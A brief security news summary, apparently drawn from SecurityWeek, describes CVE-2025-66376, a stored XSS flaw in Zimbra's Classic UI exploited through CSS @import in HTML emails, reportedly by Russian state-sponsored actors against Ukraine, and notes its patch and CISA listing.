"The stored XSS bug could allow attackers to abuse Cascading Style Sheets (CSS) @import directives in email HTML. Insufficient sanitization of CSS content within HTML email messages could allow attackers to reference external resources or to inject inline scripts that would be executed when the recipient opens the message in a browser."
"The script executes silently in the browser and begins harvesting credentials, session tokens, backup 2FA codes, browser-saved passwords, and the contents of the victim's mailbox going back 90 days with all the data exfiltrated over both DNS and HTTPS."
"The successful exploitation of the bug for remote code execution (RCE) allows threat actors to compromise the recipient's email account and the Zimbra environment."
CVE-2025-66376, a stored XSS vulnerability in Zimbra Collaboration's Classic UI with a CVSS score of 7.2, was patched in November 2025 for versions 10.1.13 and 10.0.18. The flaw stems from insufficient sanitization of CSS content in HTML emails, allowing attackers to inject scripts via CSS @import directives. Russian state-sponsored threat actors exploited this vulnerability in attacks against Ukraine, embedding JavaScript in email bodies that executes when opened. The malicious scripts harvest credentials, session tokens, 2FA backup codes, browser-saved passwords, and 90 days of mailbox contents, exfiltrating data via DNS and HTTPS. CISA added the vulnerability to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch within two weeks.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]